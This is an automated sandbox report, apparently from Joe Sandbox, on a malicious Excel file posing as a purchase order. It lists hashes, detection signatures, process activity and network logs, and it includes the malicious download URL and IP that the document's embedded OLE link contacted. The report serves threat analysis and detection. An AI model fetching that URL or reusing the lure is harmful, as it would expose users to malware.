Create Interactive Tour

Windows Analysis Report
PURCHASE ORDER 5172025.xla.xlsx

Overview

General Information

Sample name:PURCHASE ORDER 5172025.xla.xlsx
Analysis ID:1648273
MD5:e79caec024d0abddc288e30c2c974945
SHA1:2e56b64b76874ae950f7d71b115fff184e0b33f3
SHA256:fb12a393e8260ef0e83bb670f86e19ce598b14bb9bbb8f90d27b573a310180f5
Tags:xlaxlsxuser-abuse_ch
Infos:

Detection

Score:48
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Unable to load, office file is protected or invalid
Uses a known web browser user agent for HTTP communication

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w11x64_office
  • EXCEL.EXE (PID: 8128 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
    • splwow64.exe (PID: 8164 cmdline: C:\Windows\splwow64.exe 12288 MD5: 4C1F48431A4C5DE7841216C32CD98C46)
  • appidpolicyconverter.exe (PID: 2180 cmdline: "C:\Windows\system32\appidpolicyconverter.exe" MD5: 6567D9CF2545FAAC60974D9D682700D4)
    • conhost.exe (PID: 3756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 9698384842DA735D80D278A427A229AB)
  • EXCEL.EXE (PID: 6620 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PURCHASE ORDER 5172025.xla.xlsx" MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
  • cleanup
No configs have been found
No yara matches
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 162.19.137.157, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 8128, Protocol: tcp, SourceIp: 192.168.2.27, SourceIsIpv6: false, SourcePort: 49723
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.27, DestinationIsIpv6: false, DestinationPort: 49723, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 8128, Protocol: tcp, SourceIp: 162.19.137.157, SourceIsIpv6: false, SourcePort: 443
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: PURCHASE ORDER 5172025.xla.xlsxVirustotal: Detection: 28%Perma Link
Source: PURCHASE ORDER 5172025.xla.xlsxReversingLabs: Detection: 22%
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEDirectory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 13.107.246.40:443 -> 192.168.2.27:49731 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.40:443 -> 192.168.2.27:49730 version: TLS 1.2
Source: global trafficDNS query: name: t.emobility.energy
Source: global trafficDNS query: name: otelrules.svc.static.microsoft
Source: global trafficTCP traffic: 192.168.2.27:49723 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.27:49724 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.27:49731 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.27:49730 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.27:49723 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.27:49723 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.27:49723 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.27:49723 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.27:49723 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.27:49723 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.27:49723 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.27:49723 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.27:49723 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.27:49723 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.27:49723 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.27:49723 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.27:49724 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.27:49724 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.27:49724 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.27:49724 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.27:49724 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.27:49724 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.27:49724 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.27:49724 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.27:49724 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.27:49724 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.27:49724 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.27:49724 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.27:49724 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.27:49724 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.27:49730 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.27:49730 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.27:49731 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.27:49731 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.27:49730 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.27:49731 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.27:49731 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.27:49730 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.27:49731 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.27:49730 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.27:49731 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.27:49730 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.27:49731 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.27:49731 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.27:49731 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.27:49730 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.27:49730 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.27:49730 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.27:49723 -> 162.19.137.157:443
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.27:49723
Source: global trafficTCP traffic: 192.168.2.27:49723 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.27:49723 -> 162.19.137.157:443
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.27:49723
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.27:49723
Source: global trafficTCP traffic: 192.168.2.27:49723 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.27:49723 -> 162.19.137.157:443
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.27:49723
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.27:49723
Source: global trafficTCP traffic: 192.168.2.27:49723 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.27:49723 -> 162.19.137.157:443
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.27:49723
Source: global trafficTCP traffic: 192.168.2.27:49723 -> 162.19.137.157:443
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.27:49723
Source: global trafficTCP traffic: 192.168.2.27:49723 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.27:49723 -> 162.19.137.157:443
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.27:49723
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.27:49723
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.27:49723
Source: global trafficTCP traffic: 192.168.2.27:49723 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.27:49723 -> 162.19.137.157:443
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.27:49723
Source: global trafficTCP traffic: 192.168.2.27:49724 -> 162.19.137.157:443
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.27:49724
Source: global trafficTCP traffic: 192.168.2.27:49724 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.27:49724 -> 162.19.137.157:443
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.27:49724
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.27:49724
Source: global trafficTCP traffic: 192.168.2.27:49724 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.27:49724 -> 162.19.137.157:443
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.27:49724
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.27:49724
Source: global trafficTCP traffic: 192.168.2.27:49724 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.27:49724 -> 162.19.137.157:443
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.27:49724
Source: global trafficTCP traffic: 192.168.2.27:49724 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.27:49724 -> 162.19.137.157:443
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.27:49724
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.27:49724
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.27:49724
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.27:49724
Source: global trafficTCP traffic: 192.168.2.27:49724 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.27:49724 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.27:49724 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.27:49724 -> 162.19.137.157:443
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.27:49724
Source: global trafficTCP traffic: 192.168.2.27:49724 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.27:49730 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.27:49730
Source: global trafficTCP traffic: 192.168.2.27:49730 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.27:49731 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.27:49731
Source: global trafficTCP traffic: 192.168.2.27:49731 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.27:49730 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.27:49730
Source: global trafficTCP traffic: 192.168.2.27:49731 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.27:49731
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.27:49731
Source: global trafficTCP traffic: 192.168.2.27:49731 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.27:49730
Source: global trafficTCP traffic: 192.168.2.27:49730 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.27:49731 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.27:49731
Source: global trafficTCP traffic: 192.168.2.27:49730 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.27:49730
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.27:49731
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.27:49730
Source: global trafficTCP traffic: 192.168.2.27:49731 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.27:49730 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.27:49731
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.27:49730
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.27:49731
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.27:49731
Source: global trafficTCP traffic: 192.168.2.27:49731 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.27:49731 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.27:49731
Source: global trafficTCP traffic: 192.168.2.27:49731 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.27:49731
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.27:49730
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.27:49730
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.27:49730
Source: global trafficTCP traffic: 192.168.2.27:49730 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.27:49730 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.27:49730 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.27:49730
Source: excel.exeMemory has grown: Private usage: 2MB later: 165MB
Source: Joe Sandbox ViewIP Address: 13.107.246.40 13.107.246.40
Source: Joe Sandbox ViewIP Address: 13.107.246.40 13.107.246.40
Source: Joe Sandbox ViewIP Address: 162.19.137.157 162.19.137.157
Source: Joe Sandbox ViewJA3 fingerprint: 258a5a1e95b8a911872bae9081526644
Source: global trafficHTTP traffic detected: GET /kqQ8bI HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: t.emobility.energyConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /404 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: t.emobility.energyConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /kqQ8bI HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: t.emobility.energyConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /404 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: t.emobility.energyConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /rules/rule170146v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.18129; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120201v19s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.18129; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficDNS traffic detected: DNS query: t.emobility.energy
Source: global trafficDNS traffic detected: DNS query: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Mar 2025 16:51:10 GMTServer: Apache/2.4.62 (Debian)X-DNS-Prefetch-Control: offX-Frame-Options: SAMEORIGINStrict-Transport-Security: max-age=15552000; includeSubDomainsX-Download-Options: noopenX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockX-Powered-By: Next.jsETag: "1225-4lR+8o8+z0M1Iq6OMuNgxAtPjT8"Content-Type: text/html; charset=utf-8Content-Length: 4645Vary: Accept-EncodingAccess-Control-Allow-Origin: *Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, AcceptConnection: close
Source: Primary1742921417345844900_CAB00D12-EEB3-47AC-ABAA-54A4292F3135.log.0.drString found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.41/flatfontassets.pkg
Source: Primary1742921417345844900_CAB00D12-EEB3-47AC-ABAA-54A4292F3135.log.0.drString found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.41/rawguids/27140849423
Source: PURCHASE ORDER 5172025.xla.xlsxString found in binary or memory: https://t.emobility.energy/kqQ8bIi
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownHTTPS traffic detected: 13.107.246.40:443 -> 192.168.2.27:49731 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.40:443 -> 192.168.2.27:49730 version: TLS 1.2
Source: PURCHASE ORDER 5172025.xla.xlsxOLE indicator, VBA macros: true
Source: PURCHASE ORDER 5172025.xla.xlsxStream path 'MBD00A6776F/\x1Ole' : https://t.emobility.energy/kqQ8bIi2hA$9vM|"|^}2.p41=M[zTE^~Ii-=AX'drG|pB'$G*zFv\xwYYnBZX"]\Hl$WJd,W|JSA/g}]ZDLbT8cadBElRx8VvN0YMsRq2C5MysO17k8FR5MTlMPUIl5Z7ICcQOArkUAfAhKc9eA4ofQFw25yA/ *~S"i%S?
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEWindow title found: microsoft excel okexcel cannot open the file 'purchase order 5172025.xla.xlsx' because the file format or file extension is not valid. verify that the file has not been corrupted and that the file extension matches the format of the file.
Source: classification engineClassification label: mal48.winXLSX@6/9@2/2
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\~$PURCHASE ORDER 5172025.xla.xlsxJump to behavior
Source: C:\Windows\System32\appidpolicyconverter.exeMutant created: PolicyMutex
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3756:120:WilError_03
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{CAB00D12-EEB3-47AC-ABAA-54A4292F3135} - OProcSessId.datJump to behavior
Source: PURCHASE ORDER 5172025.xla.xlsxOLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\appidpolicyconverter.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: PURCHASE ORDER 5172025.xla.xlsxVirustotal: Detection: 28%
Source: PURCHASE ORDER 5172025.xla.xlsxReversingLabs: Detection: 22%
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: unknownProcess created: C:\Windows\System32\appidpolicyconverter.exe "C:\Windows\system32\appidpolicyconverter.exe"
Source: C:\Windows\System32\appidpolicyconverter.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PURCHASE ORDER 5172025.xla.xlsx"
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Windows\System32\appidpolicyconverter.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\appidpolicyconverter.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\appidpolicyconverter.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\appidpolicyconverter.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\appidpolicyconverter.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3EE60F5C-9BAD-4CD8-8E21-AD2D001D06EB}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEDirectory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: PURCHASE ORDER 5172025.xla.xlsxStatic file information: File size 1268224 > 1048576
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: PURCHASE ORDER 5172025.xla.xlsxInitial sample: OLE indicators encrypted = True
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
